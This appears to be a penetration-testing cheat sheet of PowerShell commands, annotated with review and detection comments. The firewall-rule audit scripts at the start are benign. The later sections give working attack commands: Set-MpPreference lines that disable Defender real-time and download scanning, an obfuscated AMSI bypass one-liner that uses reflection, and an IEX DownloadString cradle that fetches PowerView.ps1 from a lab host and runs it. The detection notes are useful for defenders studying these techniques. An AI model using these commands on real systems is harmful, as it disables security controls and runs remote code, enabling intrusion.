PowerShell
firewall restriction check
#firewall_rule.ps1 – Display all rules with key fields:
└─$ cat firewall_rule.ps1
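# firewall_rule.ps1 - one table row per Windows Firewall rule, for reviewing
# what is allowed, in which direction, and from which remote addresses.
#
# netsh prints each rule as a "Rule Name:" line, then a dashed separator,
# then "Key: value" lines. Fields are therefore looked up by key name rather
# than by position: positional indexing lands on the separator line and
# shifts every column, so Action/Protocol/RemoteIP end up showing other
# fields' values, which makes the audit result misleading.
#
# NOTE(review): the key names below are the English netsh labels; a localized
# Windows build prints different labels - confirm on the target host.
netsh advfirewall firewall show rule name=all |
    Select-String -Pattern '^Rule Name:' -Context 0,20 |
    ForEach-Object {
        $fields = @{}
        foreach ($line in $_.Context.PostContext) {
            # Stop at the end of this rule so values from the following
            # rule are never attributed to the current one.
            if ($line -notmatch '\S' -or $line -match '^Rule Name:') { break }

            # Split on the first colon only: IPv6 addresses in RemoteIP
            # contain further colons that must stay in the value.
            $key, $value = $line -split ':\s*', 2
            if ($null -ne $value -and -not $fields.ContainsKey($key)) {
                $fields[$key] = $value.Trim()
            }
        }

        # Keys that a rule does not print (e.g. LocalPort on ICMP rules)
        # come back as $null and render as an empty cell.
        [pscustomobject]@{
            'Rule Name' = ($_.Line -split ':\s*', 2)[1]
            'Enabled'   = $fields['Enabled']
            'Direction' = $fields['Direction']
            'Action'    = $fields['Action']
            'Protocol'  = $fields['Protocol']
            'LocalPort' = $fields['LocalPort']
            'RemoteIP'  = $fields['RemoteIP']
        }
    } | Format-Table -AutoSize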
#Remote_IP_restriction.ps1 – List only rules with RemoteIP restrictions:
└─$ cat Remote_IP_restriction.ps1
# Remote_IP_restriction.ps1 - list the firewall rules whose RemoteIP field is
# something other than "Any", i.e. rules scoped to specific remote addresses.
#
# NOTE(review): only the rule name and RemoteIP are emitted, so a listed rule
# may still be disabled or be a Block rule; check Enabled/Action before
# treating an entry as an effective restriction.
netsh advfirewall firewall show rule name=all verbose |
    Select-String "Rule Name" -Context 0,15 |
    ForEach-Object {
        # The 15 lines following the "Rule Name" match hold this rule's fields.
        $after = $_.Context.PostContext
        $scope = ($after | Where-Object { $_ -match "^RemoteIP" }) -replace "RemoteIP:\s*", ""

        # Skip rules with no RemoteIP line or with an unrestricted scope.
        if (-not ($scope -and $scope -ne "Any")) { return }

        $ruleName = ($_.Line -replace "Rule Name:\s*", "").Trim()
        [pscustomobject]@{
            'Rule Name' = $ruleName
            'RemoteIP' = $scope.Trim()
        }
    } | Format-Table -AutoSize
#Detailed check of Allow Ports rule:
# Show the full field list of a single rule by name. "Allow Ports" is
# presumably the rule name on the author's host - substitute the rule under
# review. The "verbose" keyword asks netsh for the extended set of fields.
netsh advfirewall firewall show rule name="Allow Ports" verbose
Bypass Realtime Monitoring
# Microsoft Defender Antivirus preference changes; Set-MpPreference needs an
# elevated session. With Tamper Protection enabled these changes should be
# blocked or ignored, which is the main hardening control against them.
# Detection: Defender operational log (Microsoft-Windows-Windows Defender/Operational)
# event 5001 (real-time protection disabled) and 5007 (configuration changed),
# plus process/script-block logging of "Set-MpPreference -Disable*".

# Turns off real-time (on-access) monitoring.
Set-MpPreference -DisableRealtimeMonitoring $true
# Turns off scanning of downloaded files and attachments (IOAV).
Set-MpPreference -DisableIOAVProtection $true
# NOTE(review): this disables Defender's *automatic exclusions* feature; it
# does not appear to reduce scanning, so it may not belong in this list -
# confirm against the Set-MpPreference documentation.
set-MpPreference -DisableAutoExclusions $true
AMSI Bypass
# Obfuscated one-liner: string concatenation, the -f format operator and
# backtick escapes split up the type and member names so that static
# signature matching on the plain text does not fire.
# Read as written, it stores a [type] reference in a variable, then uses
# reflection to set a non-public static field on a
# System.Management.Automation type; the reassembled names point at the AMSI
# initialisation flag, so the current PowerShell process would stop
# submitting script content for scanning. Scope is the current process only.
# Detection / mitigation:
#  - Script Block Logging (event ID 4104) records the script text; dense
#    backtick and format-operator obfuscation is itself a useful signal.
#  - Constrained Language Mode (e.g. enforced through WDAC or AppLocker)
#    restricts the .NET reflection calls this relies on.
#  - Published variants of this string are commonly signatured by AMSI/EDR;
#    NOTE(review): whether this exact form is still undetected is not shown here.
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
File Download
DownloadString - Fileless method
# Fetches script text over plain HTTP and passes it straight to
# Invoke-Expression, so nothing is written to disk by this line itself.
# 10.10.16.6 is presumably the author's lab host.
# "Fileless" does not mean unobserved: the downloaded text is still handed to
# AMSI (when active) and recorded by Script Block Logging (event ID 4104),
# and the request is visible in proxy/network logs and in the process
# command line.
# Plain HTTP gives no integrity or authenticity guarantee - the session runs
# whatever that server (or anything on the path) returns.
IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.6/PowerView.ps1')